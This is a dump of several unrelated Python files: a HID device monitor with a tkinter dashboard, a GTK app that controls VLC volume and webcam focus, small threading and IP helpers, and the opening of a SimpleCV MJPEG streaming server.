print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
return # do without gui
# if print_flag:
# print("command response: %s" % hexlify(value))
# print_flag = 0
# tool_size from CMOS: bytes 5..6
# 3f260000370b
global hid_util_fault
hid_util_fault = (int(value[START_INDEX+1]) & 0xF )
digital = (int(value[START_INDEX + 1]) << 8) + int(value[START_INDEX + 0])
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in ANALOG_INDEX_LIST]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
tool_size = (int(value[CMOS_INDEX + 1]) << 8) + int(value[CMOS_INDEX])
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
# 0674 fc41
# -62847372 = FC41 0674
# torque from Avago: bytes 6..9
torque = (int(value[TORQUE_INDEX + 2]) << 24) + (int(value[TORQUE_INDEX+3]) <<16) + (int(value[TORQUE_INDEX]) <<8) + int(value[TORQUE_INDEX+1])
insertion = (int(value[INSERTION_INDEX + 2]) << 24) + (int(value[INSERTION_INDEX+3]) <<16) + (int(value[INSERTION_INDEX]) <<8) + int(value[INSERTION_INDEX+1])
if torque > 2**31:
torque = torque - 2**32
if do_print:
print("Received data: %s" % hexlify(value))
# print("tool_size : %d" % tool_size)
# print("insertion : %d" % insertion , end="")
# print(" torque : %d" % torque)
clicker_counter = (int(value[COUNTER_INDEX+2 + 1]) << 8) + int(value[COUNTER_INDEX+2])
sleepTimer = (int(value[COUNTER_INDEX+4 + 1]) << 8) + int(value[COUNTER_INDEX+4])
encoder1 = analog[3]
encoder2 = analog[0]
encoder3 = analog[1]
encoder4 = analog[2]
MotorCur = analog[4]
clicker_analog = analog[5]
# ClickerRec = analog[6]
# batteryLevel = analog[6]
# ClickerRec is actually connected to the VREF+ pin on input P5.0
batteryLevel = analog[7]
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# global file1
L = [ str(clicker_analog), "," ,"\n" ]
# file1.writelines(L)
bool_clicker = bool((digital >> 2) & 0x0001)
bool_reset = bool((digital >> 4) & 0x0001)
bool_red_handle = bool((digital >> 7) & 0x0001)
bool_ignore_red_handle = ignore_red_handle_state
if PRODUCT_ID != PRODUCT_ID_STATION:
int_hid_stream_channel1 = analog[1]
int_inner_handle_channel1 = analog[0]
else:
int_hid_stream_channel1 = insertion
int_inner_handle_channel1 = torque
int_hid_stream_channel2 = tool_size
int_inner_handle_channel2 = analog[3]
int_clicker = clicker_analog
int_sleepTimer = sleepTimer
int_batteryLevel = batteryLevel
int_MotorCur = MotorCur
int_counter = counter
int_hid_util_fault = hid_util_fault
int_clicker_counter = clicker_counter
int_hid_stream_insertion = insertion
if PRODUCT_ID != PRODUCT_ID_STATION:
precentage_hid_stream_channel1 = int((int_hid_stream_channel1 / 4096) * 100)
precentage_inner_handle_channel1 = int((int_inner_handle_channel1 / 4096) * 100)
else:
precentage_hid_stream_channel1 = abs(int((int_hid_stream_channel1 / 1000) * 100))
precentage_inner_handle_channel1 = abs(int((int_inner_handle_channel1 / 1000) * 100))
precentage_hid_stream_channel2 = int((int_hid_stream_channel2 / 4096) * 100)
precentage_inner_handle_channel2 = int((int_inner_handle_channel2 / 4096) * 100)
precentage_clicker = int((int_clicker / 4096) * 100)
# precentage_sleepTimer = int((int_sleepTimer / 600) * 100)
precentage_sleepTimer = int(int_sleepTimer )
precentage_batteryLevel = int((int_batteryLevel / 4096) * 100)
precentage_MotorCur = int((int_MotorCur / 4096) * 100)
progressbar_style_hid_stream_channel1 = progressbar_styles[0]
progressbar_style_hid_stream_channel2 = progressbar_styles[1]
progressbar_style_inner_handle_channel1 = progressbar_styles[2]
progressbar_style_inner_handle_channel2 = progressbar_styles[3]
progressbar_style_clicker = progressbar_styles[4]
progressbar_style_sleepTimer = progressbar_styles[5]
progressbar_style_batteryLevel = progressbar_styles[6]
progressbar_style_MotorCur = progressbar_styles[7]
progressbar_hid_stream_channel1 = progressbars[0]
progressbar_hid_insertion = progressbars[0] #can I duplicate it?
progressbar_hid_stream_channel2 = progressbars[1]
progressbar_inner_handle_channel1 = progressbars[2]
progressbar_inner_handle_channel2 = progressbars[3]
progressbar_clicker = progressbars[4]
progressbar_sleepTimer = progressbars[5]
progressbar_batteryLevel = progressbars[6]
progressbar_MotorCur = progressbars[7]
checkbox_inner_clicker = inner_clicker
checkbox_red_handle = red_handle
checkbox_reset_check = reset_check
checkbox_ignore_red_handle = ignore_red_handle_checkbutton
entry_counter = counter_entry
entry_clicker_counter = clicker_counter_entry
entry_fault = fault_entry
progressbar_style_hid_stream_channel1.configure(
HID_STREAM_CHANNEL1_STYLE,
text=("%d" % int_hid_stream_channel1)
)
progressbar_style_hid_stream_channel2.configure(
HID_STREAM_CHANNEL2_STYLE,
text=("%d" % int_hid_stream_channel2)
)
progressbar_style_inner_handle_channel1.configure(
INNER_HANDLE_CHANNEL1_STYLE,
text=("%d" % int_inner_handle_channel1)
)
progressbar_style_inner_handle_channel2.configure(
INNER_HANDLE_CHANNEL2_STYLE,
text=("%d" % int_inner_handle_channel2)
)
progressbar_style_clicker.configure(
CLICKER_STYLE,
text=("%d" % int_clicker)
)
progressbar_style_sleepTimer.configure(
SLEEPTIMER_STYLE,
text=("%d" % sleepTimer)
)
progressbar_style_batteryLevel.configure(
BATTERY_LEVEL_STYLE,
text=("%d" % batteryLevel)
)
progressbar_style_MotorCur.configure(
MOTOR_CURRENT_STYLE,
text=("%d" % MotorCur)
)
# if ( batteryLevel <= 2310 ):
if ( batteryLevel <= 2288 ): # about 2.8 volt
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE,foreground="white", background="#d92929")
else:
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE, foreground="white", background="blue")
progressbar_hid_stream_channel1["value"] = precentage_hid_stream_channel1
progressbar_hid_stream_channel2["value"] = precentage_hid_stream_channel2
progressbar_inner_handle_channel1["value"] = precentage_inner_handle_channel1
progressbar_inner_handle_channel2["value"] = precentage_inner_handle_channel2
progressbar_clicker["value"] = precentage_clicker
progressbar_sleepTimer["value"] = precentage_sleepTimer
progressbar_sleepTimer["maximum"] = 600
progressbar_batteryLevel["value"] = precentage_batteryLevel
progressbar_MotorCur["value"] = precentage_MotorCur
update_checkbox(checkbox_inner_clicker, bool_clicker)
update_checkbox(checkbox_red_handle, bool_red_handle)
update_checkbox(checkbox_reset_check, bool_reset)
update_checkbox(checkbox_ignore_red_handle, bool_ignore_red_handle)
entry_counter.delete(0, tk.END)
entry_counter.insert(tk.END, "%d" % int_counter)
entry_clicker_counter.delete(0, tk.END)
entry_clicker_counter.insert(tk.END, "%d" % int_clicker_counter)
entry_fault.delete(0, tk.END)
entry_fault.insert(tk.END, "%d" % int_hid_util_fault)
root.update()
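# Illustrative sketch (not called anywhere): how the byte decoding in handler()
# above works. The 16-bit analog channels are little-endian byte pairs, while
# torque/insertion use the 32-bit layout described in the "TORQUE INSERTION"
# comment (0674 fc41 -> FC41 0674 -> -62847372 after the signed correction).
def _decode_example():
    sample = bytes([0x06, 0x74, 0xFC, 0x41])
    # 16-bit little-endian, as used for the analog list: low byte first
    analog16 = (int(sample[1]) << 8) + int(sample[0])  # 0x7406 = 29702
    # 32-bit layout used for torque/insertion: bytes reordered to FC41 0674
    raw32 = (int(sample[2]) << 24) + (int(sample[3]) << 16) + (int(sample[0]) << 8) + int(sample[1])
    if raw32 > 2**31:
        raw32 -= 2**32  # -> -62847372, matching the sample packet shown above
    return analog16, raw32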
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def my_channel_row(frame, row, label, style):
ttk.Label(frame,text=label).grid(row=row,sticky=tk.W)
row += 1
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
ttk.Label(frame,text="Channel 1").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
else:
ttk.Label(frame,text="Torque").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel1"%style))
progressbars.append(w)
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel2"%style))
progressbars.append(w)
w.grid(row=row,column=1)
return row + 1
def my_seperator(frame, row):
ttk.Separator(
frame,
orient=tk.HORIZONTAL
).grid(
pady=10,
row=row,
columnspan=3,
sticky=(tk.W + tk.E)
)
return row + 1
def my_widgets(frame):
# Add style for labeled progress bar
for name in style_names:
style = ttk.Style(
frame
)
progressbar_styles.append(style)
style.layout(
name,
[
(
"%s.trough" % name,
{
"children":
[
(
"%s.pbar" % name,
{"side": "left", "sticky": "ns"}
),
(
"%s.label" % name,
{"sticky": ""}
)
],
"sticky": "nswe"
}
)
]
)
if name == SLEEPTIMER_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d9d9d9")
elif name == BATTERY_LEVEL_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d92929")
else:
# style.configure(name, background="lime")
style.configure(name, background="#06B025")
# print(style)
row = 0
# Outer Handle
ttk.Label(frame,text="HID Streaming Values").grid(row=row,sticky=tk.W)
row += 1
text_name = "Channel 1"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Insertion"
ttk.Label(frame,text=text_name).grid(row=row,column=0)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel1"))
progressbars.append(w)
w.grid(row=row,column=0)
row -= 1 # go line back for text header
text_name = "Channel 2"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Tool Size"
ttk.Label(frame,text=text_name).grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel2"))
progressbars.append(w)
w.grid(row=row,column=1)
row += 1
# Separator
row = my_seperator(frame, row)
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
row = my_channel_row(frame=frame,row=row,label="InnerHandle",style="InnerHandle")
else:
row = my_channel_row(frame=frame,row=row,label="PRODUCT_ID_STATION",style="InnerHandle")
# Separator
row = my_seperator(frame, row)
# Clicker labels
ttk.Label(frame,text="InnerClicker").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="Clicker").grid(row=row,column=1)
ttk.Label(frame,text="ClickerCounter").grid(row=row,column=2)
row += 1
# Clicker data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global inner_clicker
inner_clicker = w
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style="Clicker")
progressbars.append(w)
w.grid(row=row,column=1)
# yg: adding clicker counter display
w = ttk.Entry(frame,width=20,)
global clicker_counter_entry
clicker_counter_entry = w
w.grid(
#padx=10,#pady=5,
row=row,
column=2,#sticky=tk.W,
)
row += 1
# Separator
row = my_seperator(frame, row)
# Red handle and reset button labels
ttk.Label(frame,text="RedHandle").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="ResetButton").grid(row=row,column=1)
ttk.Label(frame,text="IgnoreRedHandlefault").grid(row=row,column=2)
row += 1
# Red handle and reset button data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global red_handle
red_handle = w
w.grid(row=row,column=0)
w = tk.Checkbutton(frame,state=tk.DISABLED)
global reset_check
reset_check = w
w.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Start streaming",command = streaming_button_CallBack)
red_handle_ignore.grid(row=row,column=3)
# checkbox for the ignore red handle
w = tk.Checkbutton(frame,state=tk.DISABLED)
# global ignore_red
# ignore_red = w
global ignore_red_handle_checkbutton
ignore_red_handle_checkbutton = w
w.grid(row=row,column=2)
row += 1
# Separator
row = my_seperator(frame, row)
# Counter
ttk.Label(frame,text="PacketsCounter:").grid(row=row,column=0,sticky=tk.E,)
w = ttk.Entry(frame,width=20,
# """state=tk.DISABLED"""
)
global counter_entry
counter_entry = w
w.grid(padx=10,pady=5,row=row,column=1,columnspan=2,sticky=tk.W,)
# HID_Util Fault indication
ttk.Label(frame,text="Faultindication:").grid(row=row,column=1,sticky=tk.E,)
w = ttk.Entry(
frame,
width=20,
)
global fault_entry
fault_entry = w
w.grid(
padx=10,
pady=5,
row=row,
column=2,
columnspan=2,
sticky=tk.W,
)
row += 1
# Separator
row = my_seperator(frame, row)
# sleepTimer
ttk.Label(
frame,
text="Sleep Timer"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="sleepTimer"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Separator
row = my_seperator(frame, row)
# battery level
ttk.Label(
frame,
text="battery level"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="batteryLevel"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Separator
row = my_seperator(frame, row)
# Motor Cur
ttk.Label(
frame,
text="Motor Current"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="motorCurrent"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Separator
row = my_seperator(frame, row)
red_handle_ignore = tk.Button(frame,text ="Get Board Type",command = board_type_button_callback)
red_handle_ignore.grid(row=row,column=0)
red_handle_ignore = tk.Button(frame,text ="Keep alive (fast BLE)",command = alive_button_CallBack)
red_handle_ignore.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Moderate BLE",command = moderate_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
row += 1
row = my_seperator(frame, row)
red_handle_ignore = tk.Button(frame,text ="BSL !!!(DONT PRESS)",command = BSL_mode_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
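# Example invocations of the parser above (sketch; the script filename here is an
# assumption, and the IDs are the decimal forms of 0x24B3 / 0x2005):
#   python HID_Util.py                    -> no arguments, falls back to the default VENDOR_ID/PRODUCT_ID
#   python HID_Util.py -v 9395 -p 8197    -> vendor and product ID must be given together
#   python HID_Util.py -a <device-path>   -> open by path; cannot be mixed with -v/-p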
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
# Initialize the flags according from the command line arguments
avail_vid = args.vendor_id != None
avail_pid = args.product_id != None
avail_path = args.path != None
id_mode = avail_pid and avail_vid
path_mode = avail_path
default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = PRODUCT_ID_CTAG
print("try with PID = %X " % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
if device is not None:
device.write(DEFAULT_WRITE_DATA)
except:
print("wrong ID3")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID4")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
global special_cmd
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
# root. destroy()
elif PRODUCT_ID == PRODUCT_ID_CTAG:
print("BOARD_TYPE: CTAG --- new in bsl.exe")
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
# # Initialize the main window
# global root
# root = tk.Tk()
# root.title("HID_Util")
#
# # Initialize the GUI widgets
# my_widgets(root)
# Create thread that calls
threading.Thread(target=gui_loop, args=(device,), daemon=True).start()
global WRITE_DATA
if WRITE_DATA == WRITE_DATA_CMD_B:
print("WRITE_DATA == WRITE_DATA_CMD_B")
# threading.Thread(target=gui_loop, args=(device,), daemon=True).stop()
print(" Recording Ended !!!")
print(" ")
print(" Please press <Enter> to Exit")
input()
# Run the GUI main loop
# root.mainloop()
finally:
# global file1
# file1.close() #to change file access modes
if device != None:
device.close()
if __name__ == "__main__":
main()
|
BioBox.py
|
import sys
import time
import subprocess
import socket
import threading
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GLib
try:
from Analog import read_value
except (ImportError, NotImplementedError): # Provide a dummy for testing
def read_value():
yield 0
selected_channel = None
class MainUI(Gtk.Window):
def __init__(self):
super().__init__(title="Bio Box")
self.set_border_width(10)
modules = Gtk.Box()
self.add(modules)
global chan_select
chan_select = Gtk.RadioButton()
threading.Thread(target=self.read_analog, daemon=True).start()
vlcmodule = VLC(chan_select)
modules.pack_start(vlcmodule, True, True, 0)
c922module = WebcamFocus(chan_select)
modules.pack_start(c922module, True, True, 0)
def read_analog(self):
# Get analog value from Analog.py and write to selected channel's slider
for volume in read_value():
if selected_channel:
print("From slider:", volume)
# TODO: Scale 0-100% to 0-150%
GLib.idle_add(selected_channel.update_position, volume)
class Channel(Gtk.Frame):
mute_labels = ("Mute", "Muted")
def __init__(self, name, chan_select):
super().__init__(label=name, shadow_type=Gtk.ShadowType.ETCHED_IN)
# Box stuff
box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
box.set_size_request(50, 300)
self.add(box)
self.channel_name = name
#channel_label = Gtk.Label(label=self.channel_name)
#box.pack_start(channel_label, False, False, 0)
# Slider stuff
self.slider = Gtk.Adjustment(value=100, lower=0, upper=150, step_increment=1, page_increment=10, page_size=0)
level = Gtk.Scale(orientation=Gtk.Orientation.VERTICAL, adjustment=self.slider, inverted=True, draw_value=False)
level.add_mark(value=100, position=Gtk.PositionType.LEFT, markup=None)
level.add_mark(value=100, position=Gtk.PositionType.RIGHT, markup=None)
box.pack_start(level, True, True, 0)
level.connect("focus", self.focus_delay)
self.slider.connect("value-changed", self.refract_value)
# Spinner
spinvalue = Gtk.SpinButton(adjustment=self.slider)
box.pack_start(spinvalue, False, False, 0)
spinvalue.connect("focus", self.focus_delay) # TODO: get signal for +/- presses
# Mute button
self.mute = Gtk.ToggleButton(label=self.mute_labels[0])
box.pack_start(self.mute, False, False, 0)
self.mute.connect("toggled", self.muted)
self.mute.connect("focus", self.focus_delay)
# Channel selector
self.selector = Gtk.RadioButton.new_from_widget(chan_select)
self.selector.set_label("Selected")
box.pack_start(self.selector, False, False, 0)
self.selector.connect("toggled", self.check_selected)
self.connect("event", self.click_anywhere)
def focus_delay(self, widget, direction):
GLib.idle_add(self.focus_select, widget)
def focus_select(self, widget):
if widget.is_focus():
self.selector.set_active(True)
print(self.channel_name, "selected")
def click_anywhere(self, widget, event):
if "BUTTON" in event.get_event_type().value_name:
self.selector.set_active(True)
return False
elif event.get_event_type().value_name != "GDK_MOTION_NOTIFY":
print(event.get_event_type().value_name)
def check_selected(self, widget):
global selected_channel
if widget.get_active():
selected_channel = self
print(selected_channel.channel_name)
def refract_value(self, widget):
# Send adjustment value to multiple places - one will echo back
# to the source of the change, any others are echoing forward,
# hence 'refraction'.
value = round(widget.get_value())
self.write_external(value)
self.write_analog(value)
def write_analog(self, value):
pass
def read_external(self, level_cmd, mute_cmd):
buffer = b""
while True:
data = self.data_source()
if not data:
break
buffer += data
while b"\n" in buffer:
line, buffer = buffer.split(b"\n", 1)
line = line.rstrip().decode("utf-8")
attr, value = line.split(":", 1)
if attr == level_cmd:
value = int(value)
GLib.idle_add(self.update_position, value)
elif attr == mute_cmd:
GLib.idle_add(self.mute.set_active, int(value))
else:
print(attr, value)
# Fallback function if subclasses don't provide write_external()
def write_external(self, value):
print(value)
# Fallback/superclass function
def muted(self, widget):
mute_state = widget.get_active()
self.mute.set_label(self.mute_labels[mute_state])
print("Channel " + "un" * (not mute_state) + "muted")
return mute_state
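# Minimal sketch (not called anywhere) of the line protocol consumed by
# Channel.read_external() above: the data source yields raw bytes, complete lines
# look like b"<attr>: <value>\n", and read_external() routes <attr> to either the
# slider or the mute button. The attribute names below are the ones VLC asks for;
# other backends pass their own level_cmd/mute_cmd.
def _parse_protocol_example(chunk=b"volume: 75\nmuted: 0\npartial"):
    buffer = chunk
    parsed = []
    while b"\n" in buffer:
        line, buffer = buffer.split(b"\n", 1)
        attr, value = line.rstrip().decode("utf-8").split(":", 1)
        parsed.append((attr, int(value)))
    return parsed, buffer  # -> ([("volume", 75), ("muted", 0)], b"partial")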
class VLC(Channel):
def __init__(self, chan_select):
super().__init__(name="VLC", chan_select=chan_select)
self.sock = None
threading.Thread(target=self.conn, daemon=True).start()
self.last_wrote = time.monotonic()
def conn(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.connect(('localhost',4221))
except ConnectionRefusedError:
self.sock = None
return
self.sock.send(b"volume\r\nmuted\r\n") # Ask volume and mute state
with self.sock:
self.read_external("volume", "muted")
self.sock = None # TODO: Disable channel in GUI if no connection
def data_source(self):
if self.sock:
return self.sock.recv(1024)
else:
return b""
def write_external(self, value):
if self.sock:
if time.monotonic() > self.last_wrote + 0.01: # TODO: drop only writes that would result in bounce loop
self.sock.send(b"volume %d \r\n" %value)
print("To VLC: ", value)
def update_position(self, value):
self.slider.set_value(value)
self.last_wrote = time.monotonic()
def muted(self, widget):
if self.sock:
mute_state = super().muted(widget)
self.sock.send(b"muted %d \r\n" %mute_state)
print("VLC Mute status:", mute_state)
class WebcamFocus(Channel):
mute_labels = ("AF Off", "AF On")
def __init__(self, chan_select):
super().__init__(name="C922 Focus", chan_select=chan_select)
threading.Thread(target=self.conn, daemon=True).start()
# TODO: use 'quit' command in camera.py
def conn(self):
self.ssh = subprocess.Popen(["ssh", "-oBatchMode=yes", "biobox@F-22Raptor", "python3", "/home/stephen/BioBox/camera.py"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# TODO: If the process fails, disable the channel (eg if authentication fails)
# Check camera state (auto-focus, focal distance)
self.ssh.stdin.write(("cam_check\n").encode("utf-8"))
self.ssh.stdin.flush()
self.read_external("focus_absolute", "focus_auto")
def data_source(self):
return self.ssh.stdout.read1(1024)
def write_external(self, value):
if not self.mute.get_active():
self.ssh.stdin.write(("focus_absolute %d\n" %value).encode("utf-8"))
self.ssh.stdin.flush()
def update_position(self, value):
self.slider.set_value(value)
def muted(self, widget):
mute_state = super().muted(widget)
self.ssh.stdin.write(("focus_auto %d\n" %mute_state).encode("utf-8"))
self.ssh.stdin.flush()
print("C922 Autofocus " + ("Dis", "En")[mute_state] + "abled")
self.write_external(round(self.slider.get_value()))
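# Summary of the commands WebcamFocus writes to the remote camera.py over ssh
# (taken from the methods above; the remote script itself is not shown here, and
# the numeric values are illustrative):
#   "cam_check\n"           -> ask for the current focus_absolute / focus_auto state
#   "focus_absolute 120\n"  -> set the focal distance from the slider
#   "focus_auto 1\n"        -> enable autofocus ("AF On"); 0 disables it
# Replies are expected as "focus_absolute:<value>" / "focus_auto:<value>" lines,
# which Channel.read_external() parses.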
if __name__ == "__main__":
win = MainUI()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main()
|
utils.py
|
# Collection of helper functions and classes
# msgEvent could probably be put in here as well, actually...
import threading,time,socket
# simple module to repeat any job every <delay> seconds
# The scheduling library does this really well but is pretty overkill -- if you need
# more functionality in the future consider swapping over to it
# but this is honestly enough for most of the things that are required
class job():
def __init__(self, target, delay):
self.target = target
self.delay = delay
self.running = False
# start the repeatable job --- YOUR JOB WILL NEVER RUN IF THIS FUNCTION IS NOT CALLED
def start(self):
self.running = True
self.repeater = threading.Thread(target=self.rerun, daemon=True)
self.repeater.start()
# responsible for the actual act of repeating -- should never be explicitly called
def rerun(self):
while self.running:
time.sleep(self.delay)
self.target()
# idk why you'd ever want to pause a job but there you have it
def pause(self):
self.running = False  # boolean assignment is atomic so we don't have anything to worry about
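# Usage sketch for job() above (the target function is hypothetical):
#   heartbeat = job(target=send_heartbeat, delay=5)
#   heartbeat.start()   # nothing repeats until start() is called
#   heartbeat.pause()   # the loop exits after finishing the iteration in progress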
# The only way I've managed to get my own IP
# There are easier ways but they are OS specific whereas this one always works (but is a little slower)
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
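# Note: get_ip() never sends traffic, because connecting a UDP socket only selects
# the outgoing interface. It returns something like "192.168.1.23" on a typical
# LAN (the address shown is illustrative) and "127.0.0.1" when no route is available.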
|
Stream.py
|
from SimpleCV.base import *
_jpegstreamers = {}
class JpegStreamHandler(SimpleHTTPRequestHandler):
"""
The JpegStreamHandler handles requests to the threaded HTTP server.
Once initialized, any request to this port will receive a multipart/replace
jpeg.
"""
def do_GET(self):
global _jpegstreamers
if (self.path == "/" or not self.path):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("""
<html>
<head>
<style type=text/css>
body { background-image: url(/stream); background-repeat:no-repeat; background-position:center top; background-attachment:fixed; height:100% }
</style>
</head>
<body>
</body>
</html>
""")
return
elif (self.path == "/stream"):
self.send_response(200)
self.send_header("Connection", "close")
self.send_header("Max-Age", "0")
self.send_header("Expires", "0")
self.send_header("Cache-Control", "no-cache, private")
self.send_header("Pragma", "no-cache")
self.send_header("Content-Type", "multipart/x-mixed-replace; boundary=--BOUNDARYSTRING")
self.end_headers()
(host, port) = self.server.socket.getsockname()[:2]
count = 0
timeout = 0.75
lasttimeserved = 0
while (1):
if (_jpegstreamers[port].refreshtime > lasttimeserved or time.time() - timeout > lasttimeserved):
try:
self.wfile.write("--BOUNDARYSTRING\r\n")
self.send_header("Content-type", "image/jpeg")
self.send_header("Content-Length", str(len(_jpegstreamers[port].jpgdata.getvalue())))
self.end_headers()
self.wfile.write(_jpegstreamers[port].jpgdata.getvalue() + "\r\n")
lasttimeserved = time.time()
except socket.error, e:
return
except IOError, e:
return
count = count + 1
time.sleep(_jpegstreamers[port].sleeptime)
class JpegTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
#factory class for jpegtcpservers
class JpegStreamer():
"""
The JpegStreamer class allows the user to stream a jpeg encoded file
to an HTTP port. Any updates to the jpg file will automatically be pushed
to the browser via multipart/replace content type.
